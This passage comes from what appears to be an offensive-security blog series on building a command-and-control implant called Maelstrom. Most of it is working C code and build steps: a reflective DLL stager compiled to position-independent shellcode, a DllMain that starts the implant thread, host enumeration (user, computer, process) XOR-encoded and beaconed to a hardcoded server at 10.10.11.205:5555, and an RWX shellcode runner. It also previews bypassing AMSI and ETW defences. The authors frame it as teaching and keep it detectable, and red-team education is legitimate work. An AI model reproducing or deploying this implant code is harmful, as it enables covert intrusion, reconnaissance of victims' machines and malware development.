    uAddress += (DEREF_16(uOrdinals) * sizeof(DWORD));
    return Rva2Offset(DEREF_32(uAddress), uBase);
}

At this point, there should be some clear OpSec issues, if they're not obvious, we will point them out in the next few sections!

Once this is done, and the base address of the exported function is achieved, we can simple start a thread on it:

pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

hThread = ((CREATETHREAD)api.CreateThread_t)(NULL, 0, pRoutine, NULL, 0, NULL);
if (hThread == NULL)
{
    return 1;
}
((WAITFORSINGLEOBJECT)api.WaitForSingleObject_t)(hThread, INFINITE);

Aside from the glaring IOC here, there is one missing WinAPI call which would operate as a cleanup... More on that in the OpSec review posts.

Maelstrom's Entry-point

This is currently how the stager looks:

int run() {

    API Api = {
        0
    };

    DLL Dll = {
        0
    };

    if (ResolveAPIs(&Api) == FALSE) {
        return -1;
    }

#ifdef SAFE
    if (SafetyChecks(Api) == FALSE) {
        return -1;
    }
#endif

    if (GetReflectiveDLL(Api, &Dll) == FALSE) {
        return -1;
    }

    LoadReflectiveDll(Api, Dll);

    return 0;
}

We deem this as the safe version, as it has all the checks we discussed. As SAFE is a preprocessor definition, we can control whether or not its used by passing the -DSAFE flag to MingW.

The makefile:

CC         =   x86_64-w64-mingw32-gcc
LINKER      =   x86_64-w64-mingw32-ld
OBJCOPY     =   x86_64-w64-mingw32-objcopy
FLAGS       =   -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c
LINKERFLAGS =   -Wl,-Tscripts/linker.ld,--no-seh
SAFE        =   bin/maelstrom.safe.x64
UNSAFE      =   bin/maelstrom.unsafe.x64
SOURCE      =   $(wildcard src/*.c)

safe:
    nasm -f win64 asm/adjuststack.asm -o bin/adjuststack.o

    $(CC) $(SOURCE) $(FLAGS) -DSAFE $(LINKERFLAGS) -o $(SAFE).o

    $(LINKER) -s bin/adjuststack.o $(SAFE).o -o $(SAFE).exe

    $(OBJCOPY) -O binary --only-section=.text $(SAFE).exe $(SAFE).bin

    rm bin/*.o

unsafe:
    nasm -f win64 asm/adjuststack.asm -o bin/adjuststack.o

    $(CC) $(SOURCE) $(FLAGS) $(LINKERFLAGS) -o $(UNSAFE).o

    $(LINKER) -s bin/adjuststack.o $(UNSAFE).o -o $(UNSAFE).exe

    $(OBJCOPY) -O binary --only-section=.text $(UNSAFE).exe $(UNSAFE).bin

    rm bin/*.o

For the eagle-eyed, this is fully position-independent and we can show this at the end of the post.

Stage 1

Custom Reflective Loader

For our demonstration, we will use the original proof-of-concept as this uses common IOCs which we want to keep in the project to ensure that Maelstrom is easily detectable.

DLLMain

Once the DLL has been loaded from the Stage 0, DllMain will be:

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    HANDLE hThread = NULL;
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:

#ifndef _DEBUG
        hThread = CreateThread(NULL, NULL, Maelstrom, NULL, 0, NULL);
        CloseHandle(hThread);
#endif

    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}

When the DLL load reason is DLL_PROCESS_ATTACH, a new thread is created on Maelstrom() which looks like this:

DWORD WINAPI Maelstrom()
{
    // Gather initial info
    PCHAR machineInfo = GetMachineInfo();

    // Check-in
    if (Initialise(machineInfo) == FALSE)
    {
        return -1;
    }

    // do some commands
    Start();

    return 0;
}

DLL Debugging

To debug this in Visual Studio, the pre-processor definition of _DEBUG is checked for. If its not present, then allow for the thread to be created. Otherwise we resolve this function:

#ifdef _DEBUG
DLLEXPORT void DebugExport()
{
    Maelstrom();
}
#endif

And a seperate loader was written to debug it:

#include <Windows.h>

typedef void (*DebugExport)();

int main(int argc, char* argv[])
{
    HMODULE hModule = LoadLibraryA("maelstrom.1.dll");
    DebugExport f = reinterpret_cast<DebugExport>(GetProcAddress(hModule, "DebugExport"));
    f();
    return 0;
}

We found this to be a cleaner debugging experience than messing with x64dbg.

Checking In

As soon as the implant is launched, the first thing to occur is some basic enumeration which will identify the host:

char* GetMachineInfo()
{
    CHAR lpProcessName[MAX_PATH];
    CHAR lpComputerName[MAX_PATH];
    CHAR lpUserName[MAX_PATH];
    DWORD nSize = MAX_PATH;

    if (!GetComputerNameA(lpComputerName, &nSize))
    {
        return NULL;
    }

    if (!GetUserNameA(lpUserName, &nSize))
    {
        return NULL;
    }

    if (!GetModuleFileNameA(NULL, lpProcessName, MAX_PATH))
    {
        return NULL;
    }

    DWORD dwPid = GetCurrentProcessId();

    char* data = malloc(MAX_PATH * 5);

    if (!data)
    {
        return NULL;
    }

    sprintf(data,
        "{ \"init\": {\"processname\": \"%s\", \"computername\": \"%s\", \"username\": \"%s\", \"dwpid\": \"%ld\"}}",
        lpProcessName, lpComputerName, lpUserName, dwPid);

    Xor(data, strlen(data), 0xff);

    return data;

}

In the code above, the process, computer, and username are packed into a json string, along with the process ID. This is just XOR'd with a hardcoded hex value as a proof-of-concept. In a production C2, this should be encrypted with something like AES256-CBC or an equivalent encryption algorithm. As this is an example project, we don't care for this step.

// Gather initial info
char* machineInfo = GetMachineInfo();

// Check-in
if (Initialise(machineInfo) == FALSE)
{
    return;
}

Which is just a wrapper around the SendRequestA() function:

BOOL Initialise(char* machineInfo)
{
    if (SendRequestA(machineInfo))
    {
        return TRUE;
    }
    else
    {
        return FALSE;
    }
}

The SendRequestA() function uses WinHTTP, and relies on a bunch of WinAPI Calls. So, lets get into the configuration of the requests.

Similarly to stage 0, the config is hard-coded:

LPCWSTR wVerb = L"GET";
LPCWSTR wEndpoint = L"/a";
LPCWSTR wUserAgent = L"Maelstrom";
LPCWSTR wVersion = L"HTTP 1/1";
LPCWSTR wServer = L"10.10.11.205";
LPCWSTR wReferer = L"https://google.com";
LPCWSTR wHeaders = L"X-Maelstrom: password";

And some additional config:

int port = 5555;
BOOL bSsl = FALSE;
BOOL bProxy = FALSE;

Again, to repeat ourselves, do not leave these hard-coded.

Once it has initialised, we hit Start():

void Start()
{
    printf("Starting...\n");
    BOOL bRun = TRUE;
    DWORD dwOp = rand() % 4 + 1;
    
    while (bRun)
    {
        switch (dwOp)
        {
        case 0:
            printf("Simulating Task: 0\n");
            Sleep(5000);
            break;
        case 1:
            printf("Simulating Task: 1\n");
            Sleep(5000);
            break;
        case 2:
            printf("Simulating Task: 2\n");
            Sleep(5000);
            break;
        case 3:
            printf("Simulating Task: 3\n");
            Sleep(5000);
            break;
        }
        printf("Sleeping...\n");
        Sleep(10000);
    }
}

This is our simulation of tasking. Essentially it is operating as the component of the implant which will check, run, and return tasks. We are not providing that functionality though.

Safe Sleeping

One of the important ones is how the implant will look in memory in between operations. If the implant is just idling with nothing to do, it should sleep in such a way that memory scanners or engineers cannot easily identify it as malicious. This is something we will look at more in the runtime analysis, but lets take a quick look. If Process Hacker is used and the RWX region identified, this is how the region looks:

In the above, we can see the MZ Header, the DOS Message, and various section names. This needs to be removed, but we will not be providing a solution to this as we want to align with the objectives we set out in section one; but we will offer some example projects for the enthusiastic reader:

ImageBase   = GetModuleHandleA( NULL );

In the event that malware wants to load in the implant entirely through memory, so something like a Reflective DLL, this technique will not work as the GetModuleHandleA call will get the base address of the image the DLL is being loaded into. For example, say the DLL is being reflectively loaded into calc.exe, then the GetModuleHandleA will be the base of calc.exe.

Producing Shellcode for Loaders and Droppers

As we already have stage 0 as position independent which generates both an exe and bin for each stage 0 type, we can easily get the hex from the bin with:

xxd -i maelstrom.x64.unsafe.bin > shellcode.h

Produces:

unsigned char shellcode_bin[] = {
  /* Too Long */
};
unsigned int shellcode_bin_len = 5248;

This can then be loaded with:

#include <stdio.h>
#include <windows.h>
#include "buf.h"

int main()
{
    LPVOID pAddress = VirtualAlloc(nullptr, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(pAddress, buf, buf_len);
    HANDLE hThread = CreateThread(nullptr, NULL, (LPTHREAD_START_ROUTINE)pAddress, nullptr, 0, nullptr);
    Sleep(10000);
    return 0;
}

Instead of calling WaitForSingleObject on the thread, we use a Sleep in the above because the shellcode will create a new thread and exit when the RDLL is loaded, causing the thread we are waiting on to exit successfully. So, for demonstration purposes, we just sleep.

Bare in mind, with the SAFE defined, it goes up to 8192.

Now that shellcode is achieved and is loadable, this can now be wrapped in any shellcode loader:

.NET
Go
Rust
Nim

You name it, it should work!

Conclusion

After long last, we finally have some code that runs, and a plan for more functionality and security. There are manifold ways to progress the implant from here, from improving the implant's operational security to fleshing out its communication channels.

This blog post has been pretty heavily in favour of the offense, and light on operational security. As we've discussed, defensive techniques such as hooking AMSI and ETW TI present a potent limitation on the operational security of the implant. Our next two posts will look at these protections, how they work, and how an implant can attempt to bypass them.

PreviousMaelstrom #5: EDR Kernel Callbacks, Hooks, and Call Stacks NextMaelstrom #3: Building the Team Server

Last updated 1 year ago